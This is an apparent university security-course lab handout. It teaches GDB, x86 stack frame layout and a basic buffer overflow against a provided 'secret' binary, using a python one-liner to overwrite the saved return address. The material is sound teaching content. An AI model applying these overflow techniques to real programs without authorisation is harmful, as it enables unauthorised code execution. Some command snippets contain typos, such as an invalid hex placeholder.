Lab Due Date: Tuesday, September 6, 11:59 PM
Handy References
Lab 0 Goals
-
Use
gitto clone a repository full of starter code. -
Practice writing C programs and refresh your understanding of the memory layout of a process
-
Use GDB to identify and access functions, local variables, and function arguments in the stack.
-
Use GDB to map calling function calling conventions, x86 registers values.
Overview
This lab is meant to help explore the basics of reverse engineering and to set up for more advanced buffer overflow attacks in following labs. This week we will work our way through a C program to compile it into assembly and understand the basics of stack layout.
Recall from CS 31 that the stack data structure is organized into units called frames.
-
Each stack frame maintains the invariant:
%espor the stack pointer points to the top of the stack and%ebpor the base/frame pointer, points to the bottom of the stack. -
Within each stack frame, we maintain state about the function including local variables, previous stack frame base address (or the caller’s frame pointer), the instruction to return to in the caller function and function arguments.
In this lab we will use our understanding of memory layout in the stack, to explore how we might run simple stack buffer overflows.
Lab Requirements
You will be required to:
-
Understand the memory layout for
fib.cand use gdb to answer the questions inlab0-worksheet.adoc. -
Guess the secret code on
main.cby deploying a basic buffer overflow attack. -
Describe how and why your buffer overflow attack works in
lab0-worksheet.adoc.
Getting your Lab0 Starting Point Code
Log into CS88 Github for our class and get the ssh-URL to your lab git repository. Follow along with the prompts below to SSH, create a lab directory and clone your lab repos. For a refresher on getting setup with git take a look at Git Setup.
# ssh into our lab machines ssh yourusername@lab.cs.swarthmore.edu # create a cs88/labs sub-directory in your home directory mkdir ~/cs88 cd cs88 mkdir labs cd labs # clone your lab0 repo into your labs sub-directory git clone [your-ssh-URL] # change directory to list its contents cd lab0-you # ls should list the following contents ls Makefile README.md lab0-worksheet.adoc fib.c secret main.c
If you have not yet been assigned a github account, please follow the instructions below to access lab0 code and to get started with the lab.
|
# create a cs88/labs sub-directory in your home directory mkdir ~/cs88 cd cs88 mkdir labs cd labs mkdir lab0-you cd lab0-you # copy the starter code into lab0 # USAGE: cp <source> <destination> $ cp ~chaganti/public/cs88/lab0/* ./ # <-- the dot means "here" (the current directory) $ ls Makefile README.md lab0-worksheet.adoc main.c secret
Lab-0 Functionality
-
To get started with the lab run
make. You should now see a compiled binaryfibalong withsecret. Run the following command to set executable permissions onsecret:chmod +x secret. A successful attack onsecretis shown below:
$ ./secret < attack
Enter secret number:
You are so wrong!
You win!
As you work through this lab it will be helpful to have the source code open in the editor of your choice, and a separate terminal window to run gdb.
-
Your first task is to use gdb to walk through
fiband use the references provided on this lab page to answer questions inlab0-workseet.adoc. Here are some basic gdb commands to get you started:gdb fib #runs gdb debugger on fib. break main #sets a breakpoint in main break 4 #sets a breakpoint on line 4 run #runs the code and stops at the first breakpoint.info break #displays a list of breakpoints Example: Num Type Disp Enb Address What 1 breakpoint keep y 0x0000120e in main at fib.c:17 2 breakpoint keep y 0x000011ae in f at fib.c:4disas main #disassembly for main info reg #shows the register addresses and values info reg esp ebp eip #shows specific register addresses Example: esp 0xffffd810 0xffffd810 ebp 0xffffd818 0xffffd818 eip 0x565561ae 0x565561ae <f+17>info frame #information about the current frame help info frame #provides "man" page equivalent for the command. -
You can also run a single
gdbcommand in a separate terminal window to view the output ofdisas. Open a new terminal window and run the following command.# command to view assembly from functions main and f in file fib.c gdb -batch -ex 'file fib' -ex "disassemble main" -ex "disassemble f" # command to view assembly from function main in file fib.c gdb -batch -ex 'file fib' -ex "disassemble main" # command to view assembly from function main in file secret gdb -batch -ex 'file secret' -ex "disassemble main"
There are many more examples provided in the readings above, walk through those readings to answer the questions in the worksheet.
Simple Buffer Overflow
Once you are familiar with the workings of fib.c you should be ready to move on to secret.
For the second part of the lab, you are provided with a compiled binary secret that is called by main. Your job is to get to endGame() without loosing. To do so you will have to provide input to the function either that correctly guesses the secret string, and the correct secret value, or as a savy reverse engineering hack, by pass all of the code and force the function to execute endGame.
To see how secret works let’s run it with some arbitrary user input:
$ ./secret
Enter secret number:
1
You are so wrong!
Unfortunately we don’t have the source code for secret - (that would make this task trivial). But we do have main that calls on functions defined in secret. Looking at main we see that it takes as input a char buf that is 12 characters long, performs some operations on this buffer before calling endGame.
-
Naive Approach: Your first task is to use
gdbto figure out what the functionsgetSecretCodeandcalculateValuedo. Usegdbto walk through the function and figure out at a high-level what each of these functions do. -
Security Mindset: In this task, you decide to be smarter and find loopholes or vulnerabilities in the code that you can take advantage of to get past the checks to reach
endGameand succeed.-
Notice that one of the first instructions in
mainis the call toscanf. If you typeman scanfon the terminal, you will notice that there is no specification for the length of the string thatscanftakes as input! -
You can now leverage this and try to enter an input to main as a secret number that far exceeds the length of
bufand see the results. If you see a segmentation fault you are on the right track! You’ve effectively "overflown" the buffer into neighboring regions of memory (in this case the stack memory located at higher addresses), and corrupted the state of the frame causing the program to SEGFAULT.$ ./secret Enter secret number: 1233943249324320948234091238401923874129348710329587495 You are so wrong! Segmentation fault (core dumped) -
Since our goal is not to simply corrupt the code but manipulate it to win we can try being slightly smarter with how we add data to our input. We can now overflow our stack in a manner such that when reach the
eipregister we overwrite it to point to the instruction toendGame. -
To accomplish this, let’s first call
gdbwith 121s as input. To automate the process of creating multiple inputs we can use a python command to help us out:python -c 'print "1"x12' > allOnes. -
In gdb you can just pipe this input when we run
secretas follows:$gdb secret (gdb) break main Breakpoint 1 at 0x8048575 (gdb) run < allOnes Breakpoint 1, 0x08048575 in main () (gdb)You can now try to put a breakpoint right after the call to scanf to confirm that our input of all 1s is in memory. Hint: Try using the examine command
x/20w $espto view 20 words on the top of the stack. -
Once you figure out the starting address of the array
bufyou can calculate the distance from this memory address to the location ofeipon the stack. If we manage to overfloweipto point to the location ofendGame, then we have successfully launced a buffer overflow attack!
-
| In order to add a memory address into our secret number to change the value in eip, we need to account for the fact that multi-byte memory addresses in x86 CPUs use a little-endian format - i.e. from the least-significant byte ("little end") to the most-significant byte in consecutive addresses. |
-
Therefore, if we wanted to store a memory address of
0xabcdefghin our buffer following a string of1s, we would use the following commandpython -c 'print "1"*12 + "\xgh\xef\xcd\xab"'>attack.
Miscellaneous hints
| Good systems programming and reverse engineering involves: |
-
use gdb to incrementally walk through your code and provide input
-
use a piece of paper to draw out the stack
-
locate the addresses on the stack
-
repeat step 1
-
To rerun the code in gdb you can simply call
runagain rather than quittinggdband ask gdb to start from the beginning. This way, your breakpoints are preserved. -
You can also change values of variables during execution in
gdbusing(gdb) set {int}0xfffff = 3.
Grading Rubric
Total: 30 points
-
10 points for successfully causing a buffer overflow in secret.
-
20 points for completing the worksheet.
Submitting
Please remove any debugging output prior to submitting.
To submit your code, simply commit your changes locally using git add and git commit. Then run git push while in your lab directory.